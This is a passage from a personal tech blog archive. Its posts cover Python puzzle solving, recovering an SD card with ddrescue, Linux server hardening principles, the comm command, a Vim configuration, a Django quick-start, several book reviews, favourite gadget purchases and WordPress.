    So apart from these fascinating findings, I also got involved myself. I think because I solved the very first challenge with a simple AWK one-liner. But solving the followup challenge seemed trickier in AWK, though people seem to have done so (of course).

    Being completely new to Python, and seeing how popular it is, I decided to give it a go, and I must say I think I understand a bit better now why and how Python is so popular. Yes, it is well known that it forces deliberately clean code but it also provides ways for incredibly succinct code. And so far I have learned about map(), collections.counter, zip(), and cycle() Very handy, built-in functions and datatypes that I was unaware of, but which are incredibly powerful.

    Some people tend to disagree (probably very few), as I found this comment on StackOverflow when researching the Counter dict.

    I don’t think that’s fair, because in a sense every higher level programming language is an abstraction of differently expressed machine code. So unless you’re typing in machine code directly you are also using general purpose tools, and how narrow or general something is, who’s to say? And as long as it helps people do things faster — programming languages are tools after all — I’m all for it. Just let the computer worry about the zeros and ones.

    I was very surprised and pleased with the mentioned Python functions. For example, I brute-forced a solution in Bash which took probably more than 10 minutes to run, but ran in 0.07 seconds in only a couple of lines of Python. So, of course, the knowledge of the right functions and data structures once again proved to be the difference between 100 lines or 10, which reminded me of this quote of Linus Torvalds:

    So that’s it and if you want to learn something new, go give it a try!

  • Save data from your broken Raspberry Pi SD card with GNU ddrescue

    This week my Pi stopped working. After hooking up a monitor I saw kernel errors related to VFS. So the file system was obviously broken. Oops.

    The end conclusion is that the SD card is physically ‘broken’, but I still managed to salvage my data — which is more important than the card. Here’s how.

    Broken file system: fsck or dd?

    What didn’t work for me, but you might want to give a try first are fsck for file system consistency check or using dd to create a disk image.

    I couldn’t check/repair the file system with fsck (it gave errors), not even when setting different superblocks. It might work for you, so you can give this blog a try.

    Next, I tried to ‘clone’ the bits on the file system with dd. To get a usable image. But that didn’t work either, spewing out errors. But this is where I stumbled across ddrescue.

    GNU ddrescue

    I had not heard of ddrescue before but it turned out to be a life datasaver! It does what dd does, but in the process tries “to rescue the good parts first in case of read errors”. There are two versions of this program, I used the GNU version.

    sudo apt-get install gddrescue

    And here is what a sigh of relief looks like, after 43 minutes:

    So the command is:

    ddrescue -f -n /dev/[baddrive] /root/[imagefilename].img /tmp/recovery.log

    The options I used came from this blog:

    • -f Force ddrescue to run even if the destination file already exists (this is required when writing to a disk). It will overwrite.
    • -n Short for’–no-scrape’. This option prevents ddrescue from running through the scraping phase, essentially preventing the utility from spending too much time attempting to recreate heavily damaged areas of a file.

    After you have an image you can mount it and browse your data:

    mount -o loop rescue.img /mnt/rescue

    With this I had access to my data! So I got a new SD card copied my data over and chucked the old SD card. And remember:

  • The Phoenix Project

    When a co-worker handed me a copy of The Phoenix Project, the 8-bit art on the cover looked fun. But the tagline — ‘A Novel About IT, DevOps and Helping your Business Win’ — sounded a bit like the usual buzzword management lingo. But I was clearly wrong, I loved this book!

    It is unlike anything I’ve read before and it really spoke to me because the situations were so incredibly recognizable. The book tells a fictionalized story where the main character, Bill, gets promoted — more or less against his will — to VP IT Operations and subsequently inherits a bit of a mess. Things keeps breaking and escalating, causing SEV-1 outages all while the billion dollar company is having a bad couple of quarters and put all their hope on Project Phoenix. An IT project that is supposed to solve anything and everything; already three years in the making and nowhere close to be finished.

    The story revolves around Bill and his struggle of how to turn things around. On his path to discovery he is mentored by an eccentric figure called Eric (who is such a great and funny character).

    https://www.magnusdelta.com/blog/2017/9/16/thephoenixprojectsummary

    I feel like Bill and I have a lot in common, mainly because the book is really spot on when describing situations IT departments can find themselves in. Some scenes were a literal copy of things I have experienced. As if the writers were there and took notes. It made me laugh out loud or raise my eyebrows on more than one occasion. The reliance on certain key-figures, the disruption of self-involved Marketing/Sales people, the office politics, the lack of trust in teams, the weight of technical debt, the difference between requirements and customer needs. It was all too familiar. So for me the power of the book is the true-to-life examples, because those provide the basis for arguing the successful application of the theory.

    Because the book is in fact the theory of DevOps compiled into an exciting story. Which is a lot more fun than it sounds.

    Actually the book could be seen as a modern day version of The Goal by Dr. Goldratt — a book that handles the Theory of Constraints — which I had of course heard of, but never read. The writers of The Phoenix Project make no secret of their admiration for Goldratts’ theory. But DevOps is of course a thing of its own. A relatively new paradigm, borrowing from TOC, Lean and Agile principles among other things. Its goal is ‘to aim at shorter development cycles, increased deployment frequency, and more dependable releases, in close alignment with business objectives’. And where The Three Ways theory is a central aspect, unifying culture with production flow. The book shows how those theoretic mechanics work in practice. And that IT is closer to manufacturing than you might think; by breaking down the four different types of work there are in IT. That was actually an eye-opener for me. But I won’t go into too much detail about DevOps, I just wanted to point you in the right direction. If you work with different people to create anything in IT, you are probably going to like this book, and are bound to learn something.

     

  • Linux server principles

    This is a list, in no particular order, of principles to adhere when running a secure Linux server.

    1. SSH – Never allow direct SSH root access (set PermitRootLogin No).
    2. SSH – Do not use SSH keys without a passphrase.
    3. SSH – If possible, do not run SSH on a public IP interface (preferably use a management VLAN).
    4. SSH/SSL – Use strong SSH ciphers and MAC algorithms (Check with https://testssl.sh/).
    5. Never run anything as root (use sudo).
    6. Use deny all, allow only firewall principle. Block everything by default, only open what’s needed.
    7. Configure the mail daemon to use a smarthost (unless it’s a mailserver).
    8. Always use a timeserver daemon to keep server in sync (ntp).
    9. Always use a package manager and apply, at least once a month, updates (apt, yum etc.)
    10. Have backups in place and regularly test the restores.
    11. Do not just backup raw database data. Dump databases and backup those dumps (mysqldump, pg_dump).
  • GNU coreutils comm is amazing

    Most people know sort and uniq (or even diff) and usually use a mix of these tools when comparing two files. However sometimes, there is a shorter solution than piping different commands together: comm is your answer!

    The comm(1) command is one of the most powerful but also underused text tools in the coreutils package.

    Comm’s manpage description is as simple as it gets: “compare two sorted files line by line”.  It does so by giving a three column output, from the manpage:

    With no options, produce three-column output. Column one contains lines unique to FILE1, column two contains lines unique to FILE2, and column three contains lines common to both files.

    Because you have two files, and you want to COMPARE them, usually one of these three options (and their parameters) is what you want:

    • Don’t give me the lines that are only in file1  (-1)
    • Don’t give me the lines that are only in file2 (-2)
    • Don’t give me the lines that are in both files (-3)

    How is that useful? Good question! Because the real magic is when you combine the parameters:

    comm -12 file1 file2
    Print only lines present in both file1 and file2.

    What this does is you only get the third column (lines in both files): you strip column 1 and column 2 from the output. Great!

    The man page is straightforward enough, go read it. But even if it’s actually clear enough in the description, it is less clear in practicality (and I suspect this to be one of the reasons comm is often misunderstood), the files you are comparing need to be in sorted order.

    I repeat, make sure your files are sorted.

    (Also, make sure there are no ‘strange’ characters (e.g. extra carriage returns) in your files. This can hinder comparing the files.)

    Luckily in bash sorting the files inline is easy:

    comm -3 <(sort file1) <(sort file2)

    There is a little bit more to the sorting, go read this if you’re interested. Just remember to keep the files sorted and you’re good!

  • My Vim setup

    The following lines are in my .vimrc file and make working with Vim all the better!

    I keep it pretty basic, so I don’t use the very popular fugitive.vim or NERDTree plugin.
    Put these lines in ~/.vimrc or /etc/vim/vimrc (depending on your distro, sometimes they are already there but need to be uncommented), and you’re good to go.

    As for a font, I like the Liberation Mono font (11pt).

    My .vimrc file

    Explanation

    :command W w
    :command Wq wq
    :command WQ wq

    I mapped these key combinations so when I type too fast and make mistakes; Vim still does what I want it to do (save or save & quit).

    syntax on

    Some people don’t like syntax highlighting, I do.

    au BufReadPost * if line("'\"") > 1 && line("'\"") <= line("$") | exe "normal! g'\"" | endif

    This is the most complicated line in the config, but probably also most useful! When you re-open a file your cursor will be where you left of. Indispensable.

    set fileencodings=utf-8

    UTF-8 all the things, yes please.

    filetype plugin indent on

    This is the only (non-default) plugin I use. It is actually a combination of commands, but most importantly it will try to recognize filetypes and apply file specific settings (e.g. syntax highlighting)

    set expandtab
    set tabstop=4
    set shiftwidth=4

    Ok, now we’re entering dangerous territory. I actually like tabs, but spaces are more file friendly/portable. So why not ‘map’ the tab to four spaces? With these three settings, I can use tabs, but Vim will enter 4 spaces and everbody wins.

    set t_ti= t_te=

    Normally when you exit Vim, the screen will clear, and you will be back to the prompt as if nothing happened. I don’t like this, I want to see whatever it was that I was working on. With this setting I return to the prompt and see the Vim screen above.

    set showmatch " Show matching brackets.

    You want this. Especially with bracket hungry languages like PHP. Stop searching for a brackets/parentheses, Vim will highlight the matching pairs.

    set ignorecase " Do case insensitive matching

    Insensitive matching is the best, I don’t have to worry how something was spelled when searching for words.

    set incsearch " Incremental search

    When searching through a file (/) the cursor will move while typing. For some this may be disorienting, but you will find what you’re looking for with less typing.

    colorscheme molokai

    Vim comes with some preinstalled colorschemes, I tend to like molokai. It is clean, crisp, non-intrusive even on a xterm-256 terminal emulator. When I switched servers, I switched the color scheme back to default. But molokai is still pretty nice.

  • The Soul of a New Machine – Tracy Kidder

    The Soul of a New Machine – Tracy Kidder

    The Soul of a New Machine by Tracy Kidder is one of those books that always seems to pop up when computer-people’ share book recommendations. Exhibit A, exhibit B, exhibit C and so on — you get the picture.

    It is supposedly about computers, and I like computers! So I had to read it.

    And the “Winner of the Pulitzer Price” notion on the cover also seemed promising!

    The Soul of a New Machine – Tracy Kidder (1981) – 293 pages

    I had assumed it was fiction, however when I started reading it became pretty clear this is a non-fiction book. The Soul of a New Machine, follows a Digital General Corporation team of two dozen engineers in the late 70s who design a 32 bit computer — aka the Eagle — in an 18 month period under enormous pressure and inspiring leadership with ever moving deadlines and increasing market pressure.

    It’s an amazing read.

    These quotes from the authors’ website pretty much cover what’s so great about it.

    Apart from being an exceptional book, here are specific things that stood out for me:

    • Whether it was sheer luck or whether he had a nose for the industry, but Tracy Kidder was certainly at the right place, at the right time to write this story. The computer industry was still in its infancy and booming! And there were lots of companies doing similar things. But this particular company was at a crossroads and had this 32 bit computer challenge ahead of them. As a writer, those are the ingredients you want.
    • Yes, there are a lot of mind-blowing details in this book. Mind-blowing in the sense that people were able to build such a complex device but also mind-blowing that Kidder was able to write this entire process down in such lively detail.
    • Even then, computers were already incredibly complex. And computers tend to grow more complex over time. So when you take into account that this book describes enormously complex computer design from the late 70s it’s not that hard to imagine how we ended up, 40 years later, with problems like Meltdown and Spectre.
    • Computers like the Eagle were expensive. Most of the engineers who built it, pretty much couldn’t afford one. I always found this strange. This is probably the same for people who build really expensive cars.
    • When you are building a computer you could really benefit from using a computer. However this was not as straightforward as you might think. See the previous point: computers were expensive and had specific purposes. This part really put things in perspective for me.
    • Some of the engineers who worked on it didn’t even really like computers. Some because they saw a bleak future where computers would take over. And for others, it was just a puzzle to solve. 
    • Sure, this is a technical book of how a new computer was designed and built but at the heart this book is about people, relations, teamwork and leadership. The timelessness of this book is embodied not in the technical details but in the stories of how these people worked together and achieved their goals. (For lack of a better term, you could call it a management book.) And that is exactly what I like about it. I will probably forget the technical parts, no matter how interesting, but the colorful people, their backstories, motivation and relentless dedication will stay with you. I kept thinking I would also love to read such a book about people designing the original iPhone. The technical details would probably be different, but here’s the thing: I suspect there also would probably be a lot of similarities between them and this team from the 70s. Because in the end it’s about people trying to create something unique. 

    For me this book is a definitive must-read and I would personally really recommend this book to anyone. However I fully understand that this is not for everybody. It can come across as dry or too technical, but if you have ever engineered anything in or with a team or worked with strict but ever moving deadlines, you will recognize a lot and maybe even pick up a few things to put into perspective. 

    By the way, this is the machine they actually built (according to Google). The commercial name for the Eagle became the Data General Eclipse MV/8000. (picture is courtesy of the blog: The Soul of a Great Machine.)

  • Favorite 2017 purchases

    Favorite 2017 purchases

    Here’s a chronological list of some of the physical things/tools/gadgets I bought in 2017. Physical as in, I’m leaving out experiences, books and cryptocoins. Here we go.

    The Sony MDR-ZX110 headphones are decent aka good enough for my use, but more importantly also cheap enough so I don’t have to worry when I break them, which will eventually happen sooner or later. Which is mostly sooner in my experience with headphones. However these seem to be pretty durable so far, so I even got a second pair, for my wife.

    Sure, I took my time but 2017 was the year I finally got a PS4 (Slim 500GB). I also got Horizon Zero Dawn. This game alone is worth it. It’s one of the best games I’ve played. And with that one of the best Dutch export products ever. Go play it.

    Monster.

    The Stihl HS45 (60cm) hedge shears are pretty much the best hedge shears you can get. It’s the brand the pros use. I’m not a pro, but I like good tools. And because we moved, I needed to up my game from my Bosch electrical hedge shears. I love working with this machine.

    For our podcast we tried different setups and eventually settled on a pair of Neewer NW800 microphones. It is a pretty generic and widely available microphone which seems to get branded differently depending on …. who knows. (I am not sure about this but I found multiple microphones on Amazon who look are exactly like this one however they have a different name.) I wouldn’t really advise these microphones for recording singing or anything that requires a large range differences, but for podcasting they’re fine (I find post-production to be more important for podcast sound quality).

    The Makita DF457D 18v 1.5Ah drill. I already owned a Makita drill, but that was a hand-me-down and it was starting to show (mainly the batteries), so it was time for a new one. So I choose a Makita, you can’t really go wrong.

    I previously blogged about my new G-Shock GSTS100G-1B watch here. Still great!

    The Einhell TC-SM2131 miter saw, shouldn’t be in this list because it was the worst thing I bought this year. Sure it’s more of budget brand, but it already came broken out of the box (defect laser). And I had to wait 3 weeks for repair, and then it broke again after one morning of use. So I returned this and will probably never buy anything Einhell again…

    It’s a big hit. Even with the youngest one.

    When the Nintendo Switch came out I had just gotten a PS4, so I had my hands full. But that thing sure looked enticing. And when the trailer for Mario Odyssey came out in June, it became pretty clear I would get a Mario Odyssey bundle. I love it. It’s an amazing machine, and such a FUN game. I also blogged about this.

    Look at this beast.

    Of course I had to get another miter saw. Even though I probably won’t use it much, this time I went with a professional brand: Metabo KGS216M. Even at twice the price, I’d say it’s worth it. It’s a delight to work with this machine and the difference is striking. Everything is just a bit more solid/sturdy/precise. It’s the small things that make for a professional and overvall better experience.

    When the year drew to a close most game reviewers picked Zelda: Breath of the Wild as GOTY. Well, since I now owned a Switch I went out and got one. To be honest, I am still on the fence about this game. I just got it.

    So there you go! Anything particular you bought you’d like to share? Drop it in the comments.

  • Django in 10 minutes

    Django in 10 minutes

    This post is for myself, two weeks ago. I needed something like this. Or, maybe it’s for you? You know a little bit of Python, kind of understand the MVC concept and have a clear understanding of RDBMS? Congratulations, you will have no trouble getting something up and running in Django in a couple of minutes.

    Whether you need to move a database to an editable, shareable environment for less tech savvy people (phpMyAdmin), or move some spreadsheets to a database and want a quick CRUD setup? Django, a Python based web framework, can help. Follow these steps (yes, Django docs are great, but elaborate).

    Step 0 Database design

    The most important step. Forget about the rest if you don’t have this in order. Design a good database. Think about your keys and relations. You can use MySQL Workbench or edit Python code  (more on that later) to create a database. If you get this step right: Django takes care of the rest!

    Here is a small database setup I used. Made with MySQL workbench.

    MySQL workbench design

    So I created this, exported it and and imported it into a MySQL database. But you can have a different approach. As long as you think about your database design.

    Step 1 Setup your environment

    Normally this would be the first step. But since database design is vital I made that the first step. So, I assume you have a Python environment, therefore you are gonna use virtualenv. You don’t need-need it, but it creates an environment where you can’t break too much. Python uses pip to install packages. Django itself is a such a Python package, but most of the time you don’t want random development packages cluttering your main system. You want to keep all of that in your virtual environment. Virtual is a big word: it is just a dedicated directory.

    mkdir venv (or any name)
    virtualenv venv -p /usr/bin/python3.4 (or whatever your Python location is)
    source venv/bin/activate (activate the virtual environment)
    

    Bam! You are now *in* your virtual environment: noted by the prompt (venv). If you now invoke pip it installs packages only in that virtual environment. Want to leave the virtual environment? Type: deactivate.

    Step 2 Create your Django project and app

    Next, you need Django. You can install it system-wide or only within your virtual environment. Either way, just use pip:

    pip3 install Django
    pip3 install mysqlclient

    Now you have Django (and you have installed the mysqlclient with it). Depending on your system you may also need to install libmysqlclient-dev (apt-get install libmysqlclient-dev on Debian) for the mysqlclient to install correctly.

    Next: create a Django project. A Django project is a collection (a folder!) of apps. And apps are also folders. They all sit in the same root folder, together with the manage.py file. This next command creates a folder and within that folder another folder with the same name and it creates the manage.py file. This is your project.

    django-admin startproject my_fancy_project

    Next: create an app. Projects don’t do much by themselves: apart from some settings. So in the project directory where the manage.py file is, you type:

    python3 manage.py startapp my_awesome_app

    A folder will be created next to your project folder. This is your app folder and where most of the work will be done. You can create as many apps as you like. Some projects are one app, some are multiple. Apps share the project settings.

    Step 3 Create your models

    Django comes with batteries included. Meaning, by default it has a db.sqlite3 file as a database. This database stores users and sessions and all that. However I want to use MySQL.

    On to the magic!

    So my database (step 0) is in MySQL.

    In your project settings.py file point your project to this database:

    DATABASES = {
        'default': {
            'ENGINE': 'django.db.backends.mysql',
            'NAME': 'iptv',
            'USER': 'iptv',
            'PASSWORD': 'my_awesome_password',
            'HOST': '127.0.0.1',
            'PORT': '3306',
        }
    }

    Now we want to tell Django to look at our database and DO THE WORK. Use the inspectdb command to INSPECT your database and AUTOCREATE a models.py file.

    python3 manage.py inspectdb my_awesome_app/models.py

    The models.py file is your most important file. It holds the logic for your app. This is a file with essentially Python code that describes your database (every table as a class). You can also code it by hand, but inspectdb is very handy!
    Here is what my class/table/model called Package looks like in the models.py file. This is autogenerated by inspectdb. I added the __str__(self) function by hand (so you see the right name in Django). And notice how it links to your db_table ‘packages’.

    class Package(models.Model):
        idpackages = models.AutoField(primary_key=True)
        name = models.CharField(max_length=45, blank=True, default="", null=False)
    
        def __str__(self):
            return self.name
    
        class Meta:
            managed = False
            db_table = 'packages'

    Congratulations! You now have code that understands and can talk to your database!

    Step 4 Profit!

    You’re done. What do you mean? Well, this is where Django shines. It comes with a very capable Administrator interface, user management, logging and more. Django is designed to quickly get something up and running so people can start filling the database while you create a frontend (view). However for intended purposes, maybe you don’t need a frontend. Maybe the Administrator backend interface will do just fine.

    Okay, there are still a few steps. But you came this far, so the next steps are easy.

    Of course you need a user: create one. This will only work after you’ve done makemigrations and migrate (see below).

    python manage.py createsuperuser --username=jan --email=jan@j11-awesomeness.com

    This will create a Django user so you can log in to the admin backend. But wait, nothing is running yet. You can use whatever webserver you like, but batteries included, you can just start up a Python webserver:

    python manage.py runserver 0:8000
    
    (venv)[11:08:59]jan@server:~/projects/my_fancy_project$ python manage.py runserver 0:8000
    Performing system checks...
    
    System check identified no issues (0 silenced).
    November 22, 2017 - 10:09:02
    Django version 1.11.7, using settings 'project.settings'
    Starting development server at http://0:8000/
    Quit the server with CONTROL-C.

    This starts a webserver on port 8000 (choose whatever port you like). You can now browse to http://[youripaddress]:8000/admin and you will be presented with a login screen.

    Note that whenever you make changes to your database structure (don’t do this too often, start with a good design). Run the following:

    python manage.py makemigrations
    python manage.py migrate

    This will make a migration schedule for you, and migrate things. But you also need to use these commands to initially migrate from the built-in default database (db.sqlite3) to MySQL: after you defined the settings.py file (step 4).

    So, I have a user, I migrated my Django project to MySQL, I have my models.py file and I have a webserver running. So, I get a login screen like this on http://[youripaddress]:8000/admin

    Django administration login screen

    So I logged in. But where is my app? Where are my models/tables, so I can edit them? Well they are there, just not visible in the admin interface just yet. In the settings.py project file add your app to INSTALLED_APPS. And you’re done. You now have a complete CRUD environment where you can create and edit users and groups (Django default) and tables from your app (oh yeah!). It looks like this.

    Django administration interface

    When you click the tables (models!): you can see  automatic dropdown lists with database relations and checkboxes and all that. This is all generated from the models.py file.


    Django contacts exampleDjango channels example
    What’s next?

    As said, this is a quick way to get your data in de Django admin interface and start adding data, while you work on the frontend (views). I am not doing that, the admin is good enough for me. So, remember: apps are folders, the models.py file is important, most things are done with manage.py.

    Django is really popular and there are lots of tools/libraries you can use/hook into your own Django app. Just use pip. For example I use django-sql-explorer which is a full frontend to create, store and export SQL queries.

    Conclusion

    I like Django because from all the things I tried (things: easy web CRUD) this made the most sense. I also like the start-with-your-database-design approach (very reminiscent of MS Access, which I love). However, I still think it maybe is too much work. Sure, if you have done it before, know virtual environments, know manage.py, know a bit of Python,  this all really can be done in 5 minutes. Really. However, if you haven’t, maybe this could all be a bit overwhelming, so hopefully this blog helps! Or maybe there are even easier tools to get something up and running quickly?

  • Elon Musk: Tesla, SpaceX, and the Quest for a Fantastic Future

    Elon Musk: Tesla, SpaceX, and the Quest for a Fantastic Future

    This book by Ashlee Vance sat on my wish-list since it came out two years ago. So, long overdue, last week I finally got to it and boy, what a ‘fantastic‘ read it is. There is lot to say about the man, his ideas and the ways he goes about bringing those ideas to life. Whether you like stories about next-level entrepreneurship or bold boyish imagination about where we are moving as a species, this book has it.

    The book has made me even more convinced that Elon Musk might be the most interesting person in the world right now. Here are some observations about his personality from the book.

    Suffering

    • The chapter that stood out most and is most telling about the character Elon Musk is and has, is called: ‘PAIN, SUFFERING, AND SURVIVAL’ . If you only have time to read one part of the book I suggest you read this. This aptly named chapter is an exhibition of almost inhuman effort to will two companies into existence in a period where the world was heading towards the worst financial crisis ever. And not just any plain old companies, but radical, human-life altering companies: SpaceX and Tesla. These were not instant successes and the companies were on the brink of bankruptcy for most of their existence and made Elon the joke of many gossip sites (hard to remember aye?). Building one of these companies would be an insane accomplishment, let alone two. And not just that, but in that same period Musk experienced a great personal tragedy with the loss of a child. His ability to take and take and take and keep going is unparalleled. The man has a very high threshold for suffering. Other examples that underline this are the severe bullying he endured as a child (at school and from his father) and the life-threatening case of malaria he contracted as a twenty-something year old, and the way he dealt with both.

    “It’s how much you can take, and keep moving forward. That’s how winning is done.” – Rocky

    All-in

    • It seems to be all or nothing with Elon Musk. He either loves you or hates you, he either fully commits to an idea or its not a good idea. There is no in-between. He is always ready and willing to go all in. After his first company (Zip2) sold for some millions he could be set for life, but he bet it all with X/PayPal and made hundreds of millions, which he bet again on SpaceX and Tesla and nearly almost lost if it wasn’t for some lucky* breaks. (It must be noted Musk seems to defy the meaning of the word luck, his relentless push forward seems to create opportunities that other people might call luck. E.g. being able to buy a brand new $1 billion dollar Toyota factory for $42 million because of the crisis, can be called luck, or it could be the result of opportunities that come his way as a result of other efforts.)

    Planning ahead

    • Besides demonstrating near savant-like abilities for memory recollection and his fantastic imagination, Musk has great strategic skills. He is always thinking two or three steps ahead. The end-goal for SpaceX is life on Mars. The intermediate steps to get there are creating re-usable affordable rockets that NASA wants to buy to launch satellites. The end-goal for Tesla is creating affordable EVs for everyone and thereby breaking the world’s dependence on oil. But the intermediate goal is creating low volume high-end expensive EVs to get the cash-flow going to create high volume lower-end EVs.
    • What’s striking is that the things he’s doing with SpaceX, Tesla and SolarCity are things he was already thinking about as a teenager, as anecdotes and school essays will prove. However to start a space company you need a lot of money. Money made by first Zip2 and later PayPal. Intermediate steps. There are always short and long term goals with Musk.
    • In case you missed it: SolarCity is this side company his cousins run, where Musk is the largest investor and acts as an adviser and at the time of writing the book was worth $7 billion alone.

    Man of many talents

    • Besides an ultra rare combination of talents I would dare to suggest one of his greatest talents is his talent to attract other talent. Yes, he built and is building some extra-ordinary companies who produce groundbreaking technology every day and transform industries and he is the main man involved on all levels, from very specific details on welding or software design to high strategic thinking. However, he does and can not do this alone, and he knows this. He has a knack for finding and attracting like minded, passionate (near) geniuses. Of course such people seem to rather work for ambitious companies anyway, but still. Finding talent is the most important tool when building a company and Musk knows this.
    • This is not the say he exposes a lot of empathetic traits towards personnel. Remember: all or nothing. People come and go as Musk seems to fall in and out of love with them. The most wrenching example of this is a dispute with his former assistant. A woman who managed every aspect of his personal and professional multi-company life that ended after 12 years when she made some requests and he deemed her work “not that hard”. They parted and haven’t talked since.
    • Of course there are the comparisons to Jobs and Gates. Like the Tesla is the iPhone with regards to consumer impact. Or that it is very probable Musk will be the richest man in the world in a few years time. Or how the companies Apple and Microsoft bare their maker’s mark. You can make all sorts of comparisons between those men, but in the end they’re not that interesting. Even though Musk does not shy from attention he seems to mainly us it as a tool to take companies to the next level. (Btw, the book does a great job explaining why SpaceX is definitively the company that, on many levels,  embodies Musk’s spirit the best. From long term goals to dedication to get it done.)
    • Musk also has a low tolerance to suffer fools. He has no time for chit-chat, chumps down food in seconds, and is never longer in the restroom than 3 seconds, 2 of which you need to unzip your pants. He is man on a mission. A literal mission to Mars.

    All in all this is a well written book, with well researched facts and also not without criticism towards the main subject. But even though he has accomplished so much already, what is most interesting is that this is actually work in progress. So you can only wonder what the future holds for Elon Musk and therefore the world. And we are all witnesses which is kind of fun and exciting.

  • Hacker News: sort user submissions by score

    Hacker News is pretty much my goto site and sometimes I submit links or take part in the discussion. However when I recently tried to get a list of the links I submitted ordered by Hacker News score, I noticed this is not implemented on the site itself (as far as I can tell?).

    However Hacker News wouldn’t be Hacker News if they didn’t provide an API and access to their data with Firebase. So long story short; here is a small tool where you can enter a Hacker News username and it will give a list of all submissions (stories and comments) by that username ordered by score. Here is the output for my own username.

    (Note: this is written in AngularJS which I know very little about.)

    (Note 2: It works OK for my own username I am not so sure about top ranked users, the dataset may be too large.)

  • Just for Fun: The Story of an Accidental Revolutionary

    Just for Fun: The Story of an Accidental Revolutionary

    This book had been sitting on my to-read list for way too long! But I finally found a second hand copy, so here we go!

    You could say this is the official autobiography of Linus Torvalds, the creator of Linux. The Operating System that changed the world! You can wake me up in the middle of the night to talk about operating systems. So this book is right up my alley.

    It’s funny to think that more time has passed since this book came out (16 years), than the time there was between the birth of Linux and the release of the book (10 years). So an update would be welcome, however history = history and this book does a good job of documenting the rise of Linux. Even in 2001 it was clear that Linux was a huge force to be reckoned with and that it would only grow bigger from there. But I think few would suspect Linux would be the most used operating system in the world (largely) because of smartphones i.e. Android. Because people were still talking about the desktop in 2001.

    Celeb life.

    The book is structured around alternating chapters written by Linus himself and the writer David Diamond. It follows a chronological timeline. From young Linus to Linux, to underground celebrity status, to bonafide celebrity, to riches and world domination. The story is told in either conversation form between David and Linus or just plain old retelling facts. Because in 2001 things were relatively ‘fresh’ the book has some nice intricate details. Details that would probably be lost when you write a book about this subject 20 years from now. And that is probably what I liked most about it. I was familiar with most of the history, but this book does a great job of filling in the details to get a complete picture from a first degree account. Also there is quit a bit of room towards the end where Linus shares his thoughts on Intellectual Property, copyright and becoming rich (not Bill Gates rich, but still rich). Which was really interesting!

    Here are some take-aways from the book:

    • Linus is of course a programming genius. He wrote Linus when he was around 21. I would guess only a handful of people in the world were able to do what he did. And he did it at a young age. (He probably wouldn’t like this comparison: but it reminded me a lot of Bill Gates who wrote a BASIC interpreter when he was even younger.)
    • But the genius also manifests itself in the ability to make good design calls (very early on). I would even go so far as to state that his programming ability is surpassed by his talent to make the right choice (design, technical etc.)
    • He has proven this again, by unleashing git (the software versioning tool) to the world in 2005. Which made quite an impact on software development in general (e.g. it gave rise to Github) So not only did he start one of the first software revolutions, he also started the second! With git he doubled down on demonstrating the knack for making the right choices.
    • Even though he famously fell out with professor Tanenbaum, I love that he still states Tanenbaums’ book Operating Systems Design and Implementation as the book that changed his life.
    • He comes from a journalist family who were straight-up communist sympathizers and part of a Finnish minority that speaks Swedish. They also dragged young Linus to Moscow on occasion. And his grandfather was bit of a famous poet in Finland.
    • With this communist background in mind it is funny to think he is very much a pragmatist and not an idealist. But maybe exactly because of this. It’s a very conscious decision and he seems to have thought about it a lot and it permeates everything he does.
    • There is a lot of self-deprecating humor in this book.

      Linus Torvalds and Richard Stallman
    • There are quite a few sexual references. Linus starts the book with stating his view on the meaning of life: using sex as example.
    • The Tanenbaum discussion was about technical choices. The success of Linux sort of gave Linus the upper hand in the discussion. I think this irked Tanenbaum but I also suspect Tanenbaum felt that if he had just released his OS Minix to the world in the same manner Linus had, we probably wouldn’t have had Linux.
    • Stallman gave a talk at Linus’ university about GNU and this led to Linus choosing GPL as the license. And of course gcc was the programming language Linux was written in (developed by Stallman).
    • And this is key, Linus acknowledges this, his project came at the exact right time. A year later and someone else would have probably already done it. Or we would be all be using *BSD (who were still fighting other battles). A year early and no-one would have batted an eye, because too few people online were around to notice.
    • So the timing consist of 3 factors coming together: hence the word timing. The GNU license (invented by Stallman), the availability of cheap 386 processors and the internet. Take away either one and things would be different.
    • Most of all I think that the internet was key, because Linus found his co-creators there and feedback. But also because Linux became the de facto operating system for internet servers and was born around the same time the www was born. This is no coincidence. The internet en Linux grew up together.
    • Also one last point that proves he has good gut feeling, in 2001 he predicted the ubiquity of the smartphone:

    The title of the book is ‘Just for Fun’. And it is written with room for jokes and lighthearted thoughts. But there is also plenty of serious thought on ideals and pragmatism. But fun is the general theme throughout Linus’ life and the development of Linux. The fun that you get from following your curiosity, working hard on making it happen, and caring about what you do. The pragmatic approach of Linus to everything he does seems to create a sense of flow and he follows that flow and has fun with it. This is also backed by how an enormous project like the Linux kernel, which is the biggest software project in the world, is managed. The loose structure that dictates the development comes from flow.

    So all in all it’s a very fun book to read! Even if it’s from 2001 and a lot has happened since. I think there could be an updated version. Or you could ask yourself: “who, in 2017, is the equivalent of 1991 Torvalds?”. So, whose biography will we be reading in 10 years time? My money is on Vitalik Buterin (literally, I own Ethereum). He is a current day one-of-a-kind genius whose technology will probably change the world. Get it?

  • WordPress is amazing!🔥

    This blog is powered by WordPress. That means that the content you read was edited in the WordPress administrative interface and that same content is now presented to you by the WordPress engine!

    WordPress powers 24% of the web. And for good reason. It is amazing. It is free, fast and easy!

    When I had to pick a CMS for my first blog in 2005, it was a different world. It seemed that anybody who had read a PHP tutorial had also subsequently written their own CMS. There were just so many! And there was no clear winner, but there was WordPress 1.5.

    WordPress had only been around for 2 years, but it looked very promising already. I don’t remember there being one distinct reason, but I do remember that the clean and straightforward approach was what made it stand out from the others.

    One little bit of proof of this: the WordPress admin backend looks (to me) pretty much the same as it did back in 2005. Which says a lot about someone making the right design choices from the get go (or: making the right incremental improvements without breaking UX).

    Automattic and Matt

    I value the open web. And it is clear to me that the open en free web needs an open and free CMS. This is an integral part of it. And with the presence WordPress now has; it is a vital cornerstone of the open web. But there are and were dozens of CMS, most even older than WordPress, all clawing for the number one spot. Which is great and exactly the freedom the open web provides and thrives on. But it does raise the question what exactly it is that made WordPress take the number one spot? I can only speak from my own experience that using WordPress is a joy, and more people probably have that same experience. And yes, I have used others and still sometimes have to, for various reasons. And every time I do I am reminded just how wonderfully elegant WordPress is. And I don’t want to overanalyze, but I would suggest this elegance has a lot to do with Matt Mullenweg. The creator of WordPress.

    Matt comes across as a very level-headed guy with a clear vision. A vision that has enabled him to grow out this GPL (open en free) product of him into a billion dollar company with over 500 employees (yes, that’s possible!). He is around the same age as that other multi-billion-dollar company guy, but I would think the similarities end there. One guy provides free and open technology to enable people to express themselves, the other provides technology for free (which is quite different) that people use so his company can sell more ads (yes, I am deliberately putting it somewhat bluntly).

